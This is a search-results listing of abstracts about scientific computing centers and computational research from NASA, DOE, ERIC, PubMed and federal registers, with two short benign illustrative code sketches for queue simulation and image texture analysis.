    An overview is given of computational mechanics and physics at NASA Langley Research Center. Computational analysis is a major component and tool in many of Langley's diverse research disciplines, as well as in the interdisciplinary research. Examples are given for algorithm development and advanced applications in aerodynamics, transition to turbulence and turbulence simulation, hypersonics, structures, and interdisciplinary optimization.

  6. Center for computation and visualization of geometric structures. Final report, 1992 - 1995

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    NONE

    1995-11-01

    This report describes the overall goals and the accomplishments of the Geometry Center of the University of Minnesota, whose mission is to develop, support, and promote computational tools for visualizing geometric structures, for facilitating communication among mathematical and computer scientists and between these scientists and the public at large, and for stimulating research in geometry.

  7. 76 FR 56744 - Privacy Act of 1974; Notice of a Computer Matching Program

    Federal Register 2010, 2011, 2012, 2013, 2014

    2011-09-14

    ...; Notice of a Computer Matching Program AGENCY: Defense Manpower Data Center, Department of Defense (DoD... (SSA) and DoD Defense Manpower Data Center (DMDC) that their records are being matched by computer. The... intrusion of the individual's privacy and would result in additional delay in the eventual SSI payment and...

  8. Applied technology center business plan and market survey

    NASA Technical Reports Server (NTRS)

    Hodgin, Robert F.; Marchesini, Roberto

    1990-01-01

    Business plan and market survey for the Applied Technology Center (ATC), computer technology transfer and development non-profit corporation, is presented. The mission of the ATC is to stimulate innovation in state-of-the-art and leading edge computer based technology. The ATC encourages the practical utilization of late-breaking computer technologies by firms of all variety.

  9. A Queue Simulation Tool for a High Performance Scientific Computing Center

    NASA Technical Reports Server (NTRS)

    Spear, Carrie; McGalliard, James

    2007-01-01

    The NASA Center for Computational Sciences (NCCS) at the Goddard Space Flight Center provides high performance highly parallel processors, mass storage, and supporting infrastructure to a community of computational Earth and space scientists. Long running (days) and highly parallel (hundreds of CPUs) jobs are common in the workload. NCCS management structures batch queues and allocates resources to optimize system use and prioritize workloads. NCCS technical staff use a locally developed discrete event simulation tool to model the impacts of evolving workloads, potential system upgrades, alternative queue structures and resource allocation policies.
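    The kind of discrete-event model described can be sketched in a few lines. The sketch below assumes FIFO dispatch of single-processor jobs and a hypothetical function name; NCCS's actual tool models far more policy detail (parallel jobs, multiple queues, priorities):

```python
import heapq

def simulate_queue(jobs, n_cpus):
    """Minimal discrete-event model of a batch system: `jobs` is a list of
    (arrival_time, run_time) pairs; n_cpus identical processors, FIFO
    dispatch. Returns each job's wait time (start - arrival)."""
    # Represent each CPU by the time it next becomes free; a heap makes
    # "earliest-free CPU" the next event to process.
    free_at = [0.0] * n_cpus
    heapq.heapify(free_at)
    waits = []
    for arrival, run in sorted(jobs):
        cpu_free = heapq.heappop(free_at)
        start = max(arrival, cpu_free)
        waits.append(start - arrival)
        heapq.heappush(free_at, start + run)
    return waits
```

    Even a model this small lets one ask "what if" questions — e.g., replaying the same arrival trace with more CPUs or a different ordering policy and comparing wait-time distributions.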

  10. Marin Computer Center.

    ERIC Educational Resources Information Center

    Fox, Annie

    1978-01-01

    Relates some experiences at this nonprofit center, which was designed so that interested members of the general public can walk in and learn about computers in a safe, nonintimidating environment. STARWARS HODGE, a game written in PILOT, is also described. (CMV)

  11. 75 FR 65639 - Center for Scientific Review; Notice of Closed Meetings

    Federal Register 2010, 2011, 2012, 2013, 2014

    2010-10-26

    ...: Computational Biology Special Emphasis Panel A. Date: October 29, 2010. Time: 2 p.m. to 3:30 p.m. Agenda: To.... Name of Committee: Center for Scientific Review Special Emphasis Panel; Member Conflict: Computational...

  12. The Operation of a Specialized Scientific Information and Data Analysis Center With Computer Base and Associated Communications Network.

    ERIC Educational Resources Information Center

    Cottrell, William B.; And Others

    The Nuclear Safety Information Center (NSIC) is a highly sophisticated scientific information center operated at Oak Ridge National Laboratory (ORNL) for the U.S. Atomic Energy Commission. Its information file, which consists of both data and bibliographic information, is computer stored and numerous programs have been developed to facilitate the…

  13. 78 FR 42080 - Privacy Act of 1974; CMS Computer Match No. 2013-07; HHS Computer Match No. 1303; DoD-DMDC Match...

    Federal Register 2010, 2011, 2012, 2013, 2014

    2013-07-15

    ... with the Department of Defense (DoD), Defense Manpower Data Center (DMDC). We have provided background... & Medicaid Services and the Department of Defense, Defense Manpower Data Center for the Determination of...), Centers for Medicare & Medicaid Services (CMS), and Department of Defense (DoD), Defense Manpower Data...

  14. JobCenter: an open source, cross-platform, and distributed job queue management system optimized for scalability and versatility

    PubMed Central

    2012-01-01

    Background Laboratories engaged in computational biology or bioinformatics frequently need to run lengthy, multistep, and user-driven computational jobs. Each job can tie up a computer for a few minutes to several days, and many laboratories lack the expertise or resources to build and maintain a dedicated computer cluster. Results JobCenter is a client–server application and framework for job management and distributed job execution. The client and server components are both written in Java and are cross-platform and relatively easy to install. All communication with the server is client-driven, which allows worker nodes to run anywhere (even behind external firewalls or “in the cloud”) and provides inherent load balancing. Adding a worker node to the worker pool is as simple as dropping the JobCenter client files onto any computer and performing basic configuration, which provides tremendous ease-of-use, flexibility, and limitless horizontal scalability. Each worker installation may be independently configured, including the types of jobs it is able to run. Executed jobs may be written in any language and may include multistep workflows. Conclusions JobCenter is a versatile and scalable distributed job management system that allows laboratories to very efficiently distribute all computational work among available resources. JobCenter is freely available at http://code.google.com/p/jobcenter/. PMID:22846423

  15. Center for Technology for Advanced Scientific Component Software (TASCS)

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Damevski, Kostadin

    A resounding success of the Scientific Discovery through Advanced Computing (SciDAC) program is that high-performance computational science is now universally recognized as a critical aspect of scientific discovery [71], complementing both theoretical and experimental research. As scientific communities prepare to exploit the unprecedented computing capabilities of emerging leadership-class machines for multi-model simulations at the extreme scale [72], it is more important than ever to address the technical and social challenges of geographically distributed teams that combine expertise in domain science, applied mathematics, and computer science to build robust and flexible codes that can incorporate changes over time. The Center for Technology for Advanced Scientific Component Software (TASCS) tackles these issues by exploiting component-based software development to facilitate collaborative high-performance scientific computing.

  16. Use of computers and Internet among people with severe mental illnesses at peer support centers.

    PubMed

    Brunette, Mary F; Aschbrenner, Kelly A; Ferron, Joelle C; Ustinich, Lee; Kelly, Michael; Grinley, Thomas

    2017-12-01

    Peer support centers are an ideal setting where people with severe mental illnesses can access the Internet via computers for online health education, peer support, and behavioral treatments. The purpose of this study was to assess computer use and Internet access in peer support agencies. A peer-assisted survey assessed the frequency with which consumers in all 13 New Hampshire peer support centers (n = 702) used computers to access Internet resources. During the 30-day survey period, 200 of the 702 peer support consumers (28%) responded to the survey. More than three-quarters (78.5%) of respondents had gone online to seek information in the past year. About half (49%) of respondents were interested in learning about online forums that would provide information and peer support for mental health issues. Peer support centers may be a useful venue for Web-based approaches to education, peer support, and intervention. Future research should assess facilitators and barriers to use of Web-based resources among people with severe mental illness in peer support centers. (PsycINFO Database Record (c) 2017 APA, all rights reserved).

  17. Ice/water Classification of Sentinel-1 Images

    NASA Astrophysics Data System (ADS)

    Korosov, Anton; Zakhvatkina, Natalia; Muckenhuber, Stefan

    2015-04-01

    Sea ice monitoring and classification relies heavily on synthetic aperture radar (SAR) imagery. These sensors record data at horizontal polarization only (RADARSAT-1), at vertical polarization only (ERS-1 and ERS-2), or at dual polarization (Radarsat-2, Sentinel-1). Many algorithms have been developed to discriminate sea ice types and open water using single-polarization images; ice type classification, however, is still ambiguous in some cases. Sea ice classification in single-polarization SAR images has been attempted using various methods since the beginning of the ERS programme, but robust schemes that rely on SAR images alone and provide useful results across varying sea ice types and open water tend not to be generally applicable in an operational regime. The new generation of SAR satellites can deliver images in several polarizations, which improves the prospects for sea ice classification algorithms. In this study we use dual-polarization data from Sentinel-1, i.e. HH (horizontally transmitted and horizontally received) and HV (horizontally transmitted, vertically received). This mode assembles a wide SAR image from several narrower SAR beams, resulting in an image of 500 x 500 km with 50 m resolution. A non-linear scheme for classification of Sentinel-1 data has been developed. The processing identifies three classes: ice, calm water and rough water at 1 km spatial resolution. The raw sigma0 data in HH and HV polarization are first corrected for thermal and random noise by extracting the background thermal noise level and smoothing the image with several filters. At the next step, texture characteristics are computed in a moving window using a Gray-Level Co-occurrence Matrix (GLCM). At the last step, a neural network processes the array of the most informative texture characteristics and performs the ice/water classification. 
The main results are: * the most informative texture characteristics for sea ice classification were identified; * the best set of parameters, including the window size, the number of quantization levels of sigma0 values and the co-occurrence distance, was found; * a support vector machine (SVM) was trained on the results of visual classification of 30 Sentinel-1 images. Despite the generally high accuracy of the neural network (95% true-positive classification), problems arise with the classification of young, newly formed ice and rough water because of their similar average backscatter and texture. Other methods of smoothing and of computing texture characteristics (e.g. computing the GLCM from a variable-size window) are being assessed. The developed scheme will be used in NRT processing of Sentinel-1 data at NERSC within the MyOcean2 project.
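
    For illustration, the GLCM texture step described in this record can be sketched with plain NumPy. This is a minimal sketch with invented parameter values (8 gray levels, a single offset, contrast and homogeneity features); it is not the operational NERSC processing code:

```python
import numpy as np

def glcm(img, levels=8, dx=1, dy=0):
    """Gray-Level Co-occurrence Matrix for one pixel offset (dx, dy).
    img: 2-D integer array already quantized to `levels` gray levels."""
    m = np.zeros((levels, levels), dtype=float)
    h, w = img.shape
    # Pair each pixel with its neighbor at offset (dx, dy).
    a = img[max(0, -dy):h - max(0, dy), max(0, -dx):w - max(0, dx)]
    b = img[max(0, dy):h - max(0, -dy), max(0, dx):w - max(0, -dx)]
    np.add.at(m, (a.ravel(), b.ravel()), 1)
    return m / m.sum()  # normalize counts to joint probabilities

def contrast(p):
    """Haralick contrast: weights co-occurrences by squared level difference."""
    i, j = np.indices(p.shape)
    return float(np.sum(p * (i - j) ** 2))

def homogeneity(p):
    """Haralick homogeneity: high for smooth (ice-like) texture."""
    i, j = np.indices(p.shape)
    return float(np.sum(p / (1.0 + np.abs(i - j))))

# Quantize a toy sigma0 patch to 8 levels and compute two texture features,
# as would be done per moving window over the noise-corrected SAR image.
rng = np.random.default_rng(0)
patch = rng.random((32, 32))
q = np.minimum((patch * 8).astype(int), 7)
p = glcm(q, levels=8, dx=1, dy=0)
print(contrast(p), homogeneity(p))
```

In the scheme described above, feature vectors like these, computed for the most informative GLCM statistics, form the input array to the neural network classifier.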

  18. Annual Report of the Metals and Ceramics Information Center, 1 May 1979-30 April 1980.

    DTIC Science & Technology

    1980-07-01

    The Metals and Ceramics Information Center (MCIC) is one of several technical information analysis centers (IACs) chartered and sponsored by the

  19. Computer-generated formulas for three-center nuclear-attraction integrals (electrostatic potential) for Slater-type orbitals

    NASA Technical Reports Server (NTRS)

    Jones, H. W.

    1984-01-01

    The computer-assisted C-matrix, Loewdin-alpha-function, single-center expansion method in spherical harmonics has been applied to the three-center nuclear-attraction integral (potential due to the product of separated Slater-type orbitals). Exact formulas are produced for 13 terms of an infinite series that permits evaluation to ten decimal digits of an example using 1s orbitals.

  20. Computer-aided dispatch--traffic management center field operational test final detailed test plan : WSDOT deployment

    DOT National Transportation Integrated Search

    2003-10-01

    The purpose of this document is to expand upon the evaluation components presented in "Computer-aided dispatch--traffic management center field operational test final evaluation plan : WSDOT deployment". This document defines the objective, approach,...

  1. Computer-aided dispatch--traffic management center field operational test : Washington State final report

    DOT National Transportation Integrated Search

    2006-05-01

    This document provides the final report for the evaluation of the USDOT-sponsored Computer-Aided Dispatch - Traffic Management Center Integration Field Operations Test in the State of Washington. The document discusses evaluation findings in the foll...

  2. Argonne Research Library | Argonne National Laboratory

    Science.gov Websites


  3. The Effort to Reduce a Muscle Fatigue Through Gymnastics Relaxation and Ergonomic Approach for Computer Users in Central Building State University of Medan

    NASA Astrophysics Data System (ADS)

    Gultom, Syamsul; Darma Sitepu, Indra; Hasibuan, Nurman

    2018-03-01

    Fatigue due to long and continuous computer usage can lead to problems of dominant fatigue associated with decreased performance and work motivation. Specific targets in the first phase of this research have been achieved: (1) identifying complaints among workers who use computers, using the Bourdon Wiersma test kit; (2) finding the right relaxation and work-posture design as a solution to reduce muscle fatigue in computer-based workers. The study uses a research and development method, which aims to produce new products or refine existing ones. The final product is a prototype back-holder and monitor filter, together with a relaxation exercise routine and a manual book on how to perform it in front of the computer, to lower the fatigue level of computer users in Unimed's Administration Center. In the first phase, observations and interviews were conducted to identify the level of fatigue among employees who use computers at Unimed's Administration Center, using the Bourdon Wiersma test, with the following results: (1) the average velocity time of respondents in BAUK, BAAK and BAPSI after working, with an interpretation value for speed of 8.4 (WS 13), was in a good enough category; (2) the average accuracy of respondents in BAUK, BAAK and BAPSI after working, with an interpretation value for accuracy of 5.5 (WS 8), was in the doubtful category, which shows that computer users at the Unimed Administration Center experienced significant tiredness; (3) the consistency of the measured fatigue level of computer users in Unimed's Administration Center after working, with an interpretation value for consistency of 5.5 (WS 8), was also in the doubtful category, which means computer users at the Unimed Administration Center suffered extreme fatigue. 
In phase II, based on the results of the first phase of this research, the researchers offer solutions such as the prototype back-holder, a monitor filter, and a properly designed relaxation exercise to reduce the fatigue level. Furthermore, in order to maximize the exercise itself, a manual book will be given to employees who regularly work in front of computers at Unimed's Administration Center.

  4. Computer use in primary care and patient-physician communication.

    PubMed

    Sobral, Dilermando; Rosenbaum, Marcy; Figueiredo-Braga, Margarida

    2015-07-08

    This study evaluated how physicians and patients perceive the impact of computer use on clinical communication, and how a patient-centered orientation can influence this impact. The study followed a descriptive cross-sectional design and included 106 family physicians and 392 patients. An original questionnaire assessed computer use, participants' perspectives on its impact, and patient-centered strategies. Physicians reported spending 42% of consultation time in contact with the computer. Physicians reported a negative impact of computer use on patient-physician communication with regard to consultation length, confidentiality, maintaining eye contact, active listening, and the ability to understand the patient, while patients reported a positive effect for all items. Physicians considered that the usual placement of the computer in their consultation room was significantly unfavorable to patient-physician communication. In sum, physicians perceive the impact of computer use on patient-physician communication as negative, while patients perceive it positively. Computer support during consultations can represent a challenge to physicians who recognize its negative impact on patient-centered orientation. Medical education programs aiming to enhance specific communication skills and to better integrate computer use in primary care settings are needed. Copyright © 2015 Elsevier Ireland Ltd. All rights reserved.

  5. GSDC: A Unique Data Center in Korea for HEP research

    NASA Astrophysics Data System (ADS)

    Ahn, Sang-Un

    2017-04-01

    The Global Science experimental Data hub Center (GSDC) at the Korea Institute of Science and Technology Information (KISTI) is a unique data center in South Korea established to promote fundamental research fields by supporting them with expertise in Information and Communication Technology (ICT) and infrastructure for High Performance Computing (HPC), High Throughput Computing (HTC) and networking. GSDC has supported various research fields in South Korea that deal with large-scale data, e.g. the RENO experiment for neutrino research, the LIGO experiment for gravitational wave detection, genome sequencing projects for bio-medicine, and HEP experiments such as CDF at FNAL, Belle at KEK, and STAR at BNL. In particular, GSDC has run a Tier-1 center for the ALICE experiment at the LHC at CERN since 2013. In this talk, we present an overview of the computing infrastructure that GSDC runs for these research fields and discuss the data center infrastructure management system deployed at GSDC.

  6. Issues in Turbulence Simulation for Experimental Comparison

    NASA Astrophysics Data System (ADS)

    Ross, D. W.; Bravenec, R. V.; Dorland, W.; Beer, M. A.; Hammett, G. W.

    1999-11-01

    Studies of the sensitivity of fluctuation spectra and transport fluxes to local plasma parameters and gradients [D. W. Ross et al., Bull. Am. Phys. Soc. 43, 1760 (1998); D. W. Ross et al., Transport Task Force Workshop, Portland, Oregon (1999)] are continued using nonlinear gyrofluid simulation [M. A. Beer et al., Phys. Plasmas 2, 2687 (1995)] on the T3E at NERSC. Parameters characteristic of discharges in DIII-D and Alcator C-Mod are employed. In the previous work, the gradients of Z_eff, n_e, and T_e were varied within the experimental uncertainty; amplitudes and fluxes are quite sensitive to dZ_eff/dr. Here, these studies are continued and extended to the variation of other parameters, including T_e/T_i and dT_i/dr, which are important for ion temperature gradient modes. The role of electric field shear is discussed. Implications for comparison with experiment, including transient perturbations, are discussed, with the goal of quantifying the accuracy of profile data needed to verify the turbulence theory.

  7. First-principles investigation of the interlayer coupling in chromium-trichloride-a layered magnetic insulator

    NASA Astrophysics Data System (ADS)

    Kc, Santosh; McGuire, Michael A.; Cooper, Valentino R.

    The crystallographic, electronic and magnetic properties of layered CrCl3 were investigated using density functional theory. We use the newly developed spin van der Waals density functional (svdW-DF) to explore the atomic, electronic and magnetic structure. Our results indicate that treating the long-range interlayer forces with the svdW-DF improves the accuracy of crystal structure predictions. The cleavage energy was estimated to be 0.29 J/m2, suggesting that CrCl3 should be cleavable using standard mechanical exfoliation techniques. The inclusion of spin in the non-local vdW-DF allows us to directly probe the coupling between the magnetic structure and lattice degrees of freedom. An understanding of the link between electronic, magnetic and structural properties can be useful for novel device applications such as magnetoelectric devices, spin transistors, and 2D magnets. Research was sponsored by the US DOE, Office of Science, BES, MSED and Early Career Research Programs and used resources at NERSC.

  8. FOAM (Functional Ontology Assignments for Metagenomes): A Hidden Markov Model (HMM) database with environmental focus

    DOE PAGES

    Prestat, Emmanuel; David, Maude M.; Hultman, Jenni; ...

    2014-09-26

    A new functional gene database, FOAM (Functional Ontology Assignments for Metagenomes), was developed to screen environmental metagenomic sequence datasets. FOAM provides a new functional ontology dedicated to classifying gene functions relevant to environmental microorganisms based on Hidden Markov Models (HMMs). Sets of aligned protein sequences (i.e. ‘profiles’) were tailored to a large group of target KEGG Orthologs (KOs) from which HMMs were trained. The alignments were checked and curated to make them specific to the targeted KO. Within this process, sequence profiles were enriched with the most abundant sequences available to maximize the yield of accurate classifier models. An associated functional ontology was built to describe the functional groups and hierarchy. FOAM allows the user to select the target search space before HMM-based comparison steps and to easily organize the results into different functional categories and subcategories. FOAM is publicly available at http://portal.nersc.gov/project/m1317/FOAM/.
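
    The profile idea behind training classifiers from curated alignments can be illustrated with a much simpler position-specific scoring model. This is a toy sketch with an invented alignment; FOAM's actual models are full profile HMMs trained with dedicated tools:

```python
import math
from collections import Counter

def build_profile(alignment, alphabet="ACDEFGHIKLMNPQRSTVWY", pseudocount=1.0):
    """Position-specific log-odds scores from gap-free aligned sequences,
    with pseudocounts so unseen residues get finite (negative) scores."""
    ncols = len(alignment[0])
    background = 1.0 / len(alphabet)  # uniform background frequencies
    profile = []
    for col in range(ncols):
        counts = Counter(seq[col] for seq in alignment)
        total = len(alignment) + pseudocount * len(alphabet)
        profile.append({aa: math.log(((counts[aa] + pseudocount) / total)
                                     / background)
                        for aa in alphabet})
    return profile

def score(seq, profile):
    """Log-odds score of a candidate sequence against the profile."""
    return sum(col[aa] for col, aa in zip(profile, seq))

# Toy alignment: three sequences sharing a conserved motif.
alignment = ["ACDG", "ACDG", "ACEG"]
profile = build_profile(alignment)
print(score("ACDG", profile), score("WYWY", profile))
```

A sequence matching the conserved columns scores well above an unrelated one, which is the same discrimination principle an HMM search applies, with the addition of insert/delete states and trained transition probabilities.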

  9. Simple Map with Low MN Perturbation for a Single-Null Divertor Tokamak with Constant Width of Stochastic Layer

    NASA Astrophysics Data System (ADS)

    Verma, Arun; Smith, Terry; Punjabi, Alkesh; Boozer, Allen

    1996-11-01

    In this work, we investigate the effects of low MN perturbations in a single-null divertor tokamak with a stochastic scrape-off layer. The unperturbed magnetic topology of a single-null divertor tokamak is represented by the Simple Map [Punjabi A, Verma A and Boozer A, Phys Rev Lett 69, 3322 (1992); J Plasma Phys 52, 91 (1994)]. We choose combinations of the map parameter k and the strength of the low MN perturbation such that the width of the stochastic layer remains unchanged. We give detailed results on the effects of low MN perturbation on the magnetic topology of the stochastic layer and on the footprint of field lines on the divertor plate under the constraint of constant stochastic-layer width. Low MN perturbations occur naturally, so their effects are of considerable importance in tokamak divertor physics. This work is supported by US DOE OFES. Use of the CRAY at HU and at NERSC is gratefully acknowledged.

  10. First-principles simulations of Graphene/Transition-metal-Dichalcogenides/Graphene Field-Effect Transistor

    NASA Astrophysics Data System (ADS)

    Li, Xiangguo; Wang, Yun-Peng; Zhang, X.-G.; Cheng, Hai-Ping

    A prototype field-effect transistor (FET) with fascinating properties can be made by assembling graphene and two-dimensional insulating crystals into three-dimensional stacks with atomic-layer precision. Transition metal dichalcogenides (TMDCs) such as WS2 and MoS2 are good candidates for the atomically thin barrier between two layers of graphene in the vertical FET due to their sizable bandgaps. We investigate the electronic properties of the graphene/TMDC/graphene sandwich structure using a first-principles method. We find that the effective tunnel barrier height of the TMDC layers in contact with the graphene electrodes depends on the number of layers and can be modulated by a gate voltage. Consequently, a very high ON/OFF ratio can be achieved with an appropriate number of TMDC layers and a suitable range of gate voltage. The spin-orbit coupling in TMDC layers is also layer dependent but unaffected by the gate voltage. These properties can be important in future nanoelectronic device designs. DOE/BES-DE-FG02-02ER45995; NERSC.

  11. High performance computing for advanced modeling and simulation of materials

    NASA Astrophysics Data System (ADS)

    Wang, Jue; Gao, Fei; Vazquez-Poletti, Jose Luis; Li, Jianjiang

    2017-02-01

    The First International Workshop on High Performance Computing for Advanced Modeling and Simulation of Materials (HPCMS2015) was held in Austin, Texas, USA, Nov. 18, 2015. HPCMS 2015 was organized by Computer Network Information Center (Chinese Academy of Sciences), University of Michigan, Universidad Complutense de Madrid, University of Science and Technology Beijing, Pittsburgh Supercomputing Center, China Institute of Atomic Energy, and Ames Laboratory.

  12. Children's Emerging Digital Literacies: Investigating Home Computing in Low- and Middle-Income Families. CCT Reports.

    ERIC Educational Resources Information Center

    Ba, Harouna; Tally, Bill; Tsikalas, Kallen

    The EDC (Educational Development Center) Center for Children and Technology (CCT) and Computers for Youth (CFY) completed a 1-year comparative study of children's use of computers in low- and middle-income homes. The study explores the digital divide as a literacy issue, rather than merely a technical one. Digital literacy is defined as a set of…

  13. Computer-aided dispatch--traffic management center field operational test : state of Utah final report

    DOT National Transportation Integrated Search

    2006-07-01

    This document provides the final report for the evaluation of the USDOT-sponsored Computer-Aided Dispatch Traffic Management Center Integration Field Operations Test in the State of Utah. The document discusses evaluation findings in the followin...

  14. Aviation Mechanic General, Airframe, and Powerplant Knowledge Test Guide

    DOT National Transportation Integrated Search

    1995-01-01

    The FAA has available hundreds of computer testing centers nationwide. These testing centers offer the full range of airman knowledge tests. Refer to appendix 1 in this guide for a list of computer testing designees. This knowledge test guide was dev...

  15. Computer-aided dispatch--traffic management center field operational test final test plans : state of Utah

    DOT National Transportation Integrated Search

    2004-01-01

    The purpose of this document is to expand upon the evaluation components presented in "Computer-aided dispatch--traffic management center field operational test final evaluation plan : state of Utah". This document defines the objective, approach, an...

  16. 75 FR 70899 - Submission for OMB Review; Comment Request

    Federal Register 2010, 2011, 2012, 2013, 2014

    2010-11-19

    ... submit to the Office of Management and Budget (OMB) for clearance the following proposal for collection... Annual Burden Hours: 2,952. Public Computer Center Reports (Quarterly and Annually) Number of Respondents... specific to Infrastructure and Comprehensive Community Infrastructure, Public Computer Center, and...

  17. PCs: Key to the Future. Business Center Provides Sound Skills and Good Attitudes.

    ERIC Educational Resources Information Center

    Pay, Renee W.

    1991-01-01

    The Advanced Computing/Management Training Program at Jordan Technical Center (Sandy, Utah) simulates an automated office to teach five sets of skills: computer architecture and operating systems, word processing, data processing, communications skills, and management principles. (SK)

  18. The CSM testbed software system: A development environment for structural analysis methods on the NAS CRAY-2

    NASA Technical Reports Server (NTRS)

    Gillian, Ronnie E.; Lotts, Christine G.

    1988-01-01

    The Computational Structural Mechanics (CSM) Activity at Langley Research Center is developing methods for structural analysis on modern computers. To facilitate that research effort, an applications development environment has been constructed to insulate the researcher from the many computer operating systems of a widely distributed computer network. The CSM Testbed development system was ported to the Numerical Aerodynamic Simulator (NAS) Cray-2 at the Ames Research Center to provide a high-end computational capability. This paper describes the implementation experiences, the resulting capability, and future directions for the Testbed on supercomputers.

  19. How the Theory of Computing Can Help in Space Exploration

    NASA Technical Reports Server (NTRS)

    Kreinovich, Vladik; Longpre, Luc

    1997-01-01

    The opening of the NASA Pan American Center for Environmental and Earth Sciences (PACES) at the University of Texas at El Paso made it possible to organize the student Center for Theoretical Research and its Applications in Computer Science (TRACS). In this abstract, we briefly describe the main NASA-related research directions of the TRACS center, and give an overview of the preliminary results of student research.

  20. Examining the Fundamental Obstructs of Adopting Cloud Computing for 9-1-1 Dispatch Centers in the USA

    ERIC Educational Resources Information Center

    Osman, Abdulaziz

    2016-01-01

    The purpose of this research study was to examine the unknown fears of embracing cloud computing, spanning dimensions such as leaders' fear of change and the complexity of the technology, in 9-1-1 dispatch centers in the USA. The problem addressed in the study was that many 9-1-1 dispatch centers in the USA are still using old…

  1. Synergies and Distinctions between Computational Disciplines in Biomedical Research: Perspective from the Clinical and Translational Science Award Programs

    PubMed Central

    Bernstam, Elmer V.; Hersh, William R.; Johnson, Stephen B.; Chute, Christopher G.; Nguyen, Hien; Sim, Ida; Nahm, Meredith; Weiner, Mark; Miller, Perry; DiLaura, Robert P.; Overcash, Marc; Lehmann, Harold P.; Eichmann, David; Athey, Brian D.; Scheuermann, Richard H.; Anderson, Nick; Starren, Justin B.; Harris, Paul A.; Smith, Jack W.; Barbour, Ed; Silverstein, Jonathan C.; Krusch, David A.; Nagarajan, Rakesh; Becich, Michael J.

    2010-01-01

    Clinical and translational research increasingly requires computation. Projects may involve multiple computationally-oriented groups including information technology (IT) professionals, computer scientists and biomedical informaticians. However, many biomedical researchers are not aware of the distinctions among these complementary groups, leading to confusion, delays and sub-optimal results. Although written from the perspective of clinical and translational science award (CTSA) programs within academic medical centers, the paper addresses issues that extend beyond clinical and translational research. The authors describe the complementary but distinct roles of operational IT, research IT, computer science and biomedical informatics using a clinical data warehouse as a running example. In general, IT professionals focus on technology. The authors distinguish between two types of IT groups within academic medical centers: central or administrative IT (supporting the administrative computing needs of large organizations) and research IT (supporting the computing needs of researchers). Computer scientists focus on general issues of computation such as designing faster computers or more efficient algorithms, rather than specific applications. In contrast, informaticians are concerned with data, information and knowledge. Biomedical informaticians draw on a variety of tools, including but not limited to computers, to solve information problems in health care and biomedicine. The paper concludes with recommendations regarding administrative structures that can help to maximize the benefit of computation to biomedical research within academic health centers. PMID:19550198

  2. Funding Public Computing Centers: Balancing Broadband Availability and Expected Demand

    ERIC Educational Resources Information Center

    Jayakar, Krishna; Park, Eun-A

    2012-01-01

    The National Broadband Plan (NBP) recently announced by the Federal Communication Commission visualizes a significantly enhanced commitment to public computing centers (PCCs) as an element of the Commission's plans for promoting broadband availability. In parallel, the National Telecommunications and Information Administration (NTIA) has…

  3. Transportation Research and Analysis Computing Center (TRACC) Year 6 Quarter 4 Progress Report

    DOT National Transportation Integrated Search

    2013-03-01

    Argonne National Laboratory initiated a FY2006-FY2009 multi-year program with the US Department of Transportation (USDOT) on October 1, 2006, to establish the Transportation Research and Analysis Computing Center (TRACC). As part of the TRACC project...

  4. Aerodynamic Characterization of a Modern Launch Vehicle

    NASA Technical Reports Server (NTRS)

    Hall, Robert M.; Holland, Scott D.; Blevins, John A.

    2011-01-01

    A modern launch vehicle is by necessity an extremely integrated design. The accurate characterization of its aerodynamic characteristics is essential to determine design loads, to design flight control laws, and to establish performance. The NASA Ares Aerodynamics Panel has been responsible for technical planning, execution, and vetting of the aerodynamic characterization of the Ares I vehicle. An aerodynamics team supporting the Panel consists of wind tunnel engineers, computational engineers, database engineers, and other analysts that address topics such as uncertainty quantification. The team resides at three NASA centers: Langley Research Center, Marshall Space Flight Center, and Ames Research Center. The Panel has developed strategies to synergistically combine both the wind tunnel efforts and the computational efforts with the goal of validating the computations. Selected examples highlight key flow physics and, where possible, the fidelity of the comparisons between wind tunnel results and the computations. Lessons learned summarize what has been gleaned during the project and can be useful for other vehicle development projects.

  5. Computer Program for Steady Transonic Flow over Thin Airfoils by Finite Elements

    DTIC Science & Technology

    1975-10-01

    Computer Program for Steady Transonic Flow over Thin Airfoils by Finite Elements. This report was prepared by personnel in the Computational Mechanics Section of the Lockheed Missiles & Space Company, Inc., Huntsville Research & Engineering Center, Huntsville, Alabama.

  6. Developing computer training programs for blood bankers.

    PubMed

    Eisenbrey, L

    1992-01-01

    Two surveys were conducted in July 1991 to gather information about computer training currently performed within American Red Cross Blood Services Regions. One survey was completed by computer trainers from software developer-vendors and regional centers. The second survey was directed to the trainees, to determine their perception of the computer training. The surveys identified the major concepts, length of training, evaluations, and methods of instruction used. Strengths and weaknesses of training programs were highlighted by trainee respondents. Using the survey information and other sources, recommendations (including those concerning which computer skills and tasks should be covered) are made that can be used as guidelines for developing comprehensive computer training programs at any blood bank or blood center.

  7. Intercomparison of Operational Ocean Forecasting Systems in the framework of GODAE

    NASA Astrophysics Data System (ADS)

    Hernandez, F.

    2009-04-01

    One of the main benefits of the GODAE 10-year activity is the implementation of ocean forecasting systems in several countries. In 2008, several systems were operated routinely at global or basin scale. Among them, the BLUElink (Australia), HYCOM (USA), MOVE/MRI.COM (Japan), Mercator (France), FOAM (United Kingdom), TOPAZ (Norway) and C-NOOFS (Canada) systems offered to demonstrate their operational feasibility by performing an intercomparison exercise over a three-month period (February to April 2008). The objectives were: a) to show that operational ocean forecasting systems are operated routinely in different countries, and that they can interact; b) to perform, in a similar way, a scientific validation aimed at assessing the quality of the ocean estimates and the performance and forecasting capabilities of each system; and c) to learn from this intercomparison exercise in order to increase interoperability and collaboration in real time. The intercomparison relies on the assessment strategy developed for the EU MERSEA project, in which diagnostics over the global ocean were revisited by the GODAE contributors. This approach, based on metrics, allows each system: a) to verify that ocean estimates are consistent with the current general knowledge of the dynamics; and b) to evaluate the accuracy of delivered products compared to space and in-situ observations. Using the same diagnostics also allows the results from each system to be intercompared consistently. Water masses and the general circulation described by the different systems are consistent with the WOA05 Levitus climatology. The large-scale dynamics (tropical, subtropical and subpolar gyres) are also correctly reproduced. At short scales, the benefit of high-resolution systems is evident in the turbulent eddy field, in particular when compared to eddy kinetic energy deduced from satellite altimetry or drifter observations. 
